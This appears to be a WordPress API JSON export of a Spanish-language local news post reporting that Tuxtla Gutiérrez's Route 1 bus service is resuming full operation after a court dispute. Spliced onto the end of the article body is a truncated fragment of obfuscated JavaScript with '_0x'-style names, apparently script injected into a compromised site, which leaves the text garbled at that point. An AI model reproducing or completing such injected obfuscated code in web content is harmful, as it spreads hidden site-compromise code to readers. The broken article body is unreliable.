{"id":21755,"date":"2025-05-06T03:08:39","date_gmt":"2025-05-06T03:08:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21755"},"modified":"2025-05-06T03:08:39","modified_gmt":"2025-05-06T03:08:39","slug":"regresa-a-circulacion-la-ruta-1-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21755","title":{"rendered":"Regresa a circulaci\u00f3n la Ruta 1 de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043-1024x768.jpg\" alt=\"\" class=\"wp-image-21756\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0043.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>5 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes Transportistas concesionados informaron el retorno al cien por ciento de la ruta uno de Tuxtla Guti\u00e9rrez con mejoras sustanciales<\/p>\n\n\n\n<p>De acuerdo con los representantes de los socios a partir de este lunes 5 de mayo la mayor\u00eda de las unidades corresponden a esta ruta y las que se implementaron en el Plan Emergente retornar\u00e1n a sus correspondientes rutas.<\/p>\n\n\n\n<p>Jos\u00e9 Alfonso Rinc\u00f3n Gumeta, socio fundador de la ruta 1 dio a conocer que luego de ganar un juicio en contra del ex secretario de transporte, Aquiles Espinosa quien les arrebat\u00f3 sus derechos, por fin se reincorporan a laborar.<\/p>\n\n\n\n<p>\u201cGracias a la buena voluntad del gobernador porque solo nos daban trabas, no nos daban respuesta, as\u00ed que el reconocimiento es al ejecutivo por atender y resolver este conflicto\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Son m\u00e1s de 50 unidades las que ya est\u00e1n laborando en la ruta 1 y es espera que en los pr\u00f3ximos 15 d\u00edas puedan retornar otras 20 unidades porque es complejo conseguir las unidades nuevas en las agencias.<\/p>\n\n\n\n<p>\u201cNos piden mucho tiempo de espera entonces ser\u00e1 gradual pero la ruta como tal ya est\u00e1 trabajando, ya est\u00e1 funcionando para servir a los tuxtlecos\u201d, destac\u00f3.<\/p>\n\n\n\n<p>En total ser\u00e1n 148 unidades las que estar\u00e1n regresando lo antes posible con diferentes mejoras.<\/p>\n\n\n\n<p>Record\u00f3 que el servicio se presta desde las 5:30 de la ma\u00f1ana a las diez de la noche.<\/p>\n\n\n\n<p>Dentro de la mejora constante del servicio a los usuarios est\u00e1 el que los conductores porten uniforme, est\u00e9n debidamente identificados y sen aptos para conducir las unidades.<\/p>\n\n\n\n<p>Otro punto a destacar es que, los concesionarios tienen contemplado contar con supervisores sorpresa en esta ruta para vigilar que se cumpla con el buen servicio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 5 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Este lunes Transportistas concesionados informaron el retorno al cien por ciento de la ruta uno de Tuxtla Guti\u00e9rrez con mejoras sustanciales De acuerdo con los representantes de los socios a partir de este lunes 5 de mayo la mayor\u00eda de las unidades corresponden a esta ruta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21756,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21755","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21755","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21755"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21755\/revisions"}],"predecessor-version":[{"id":21757,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21755\/revisions\/21757"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21756"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21755"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21755"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21755"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}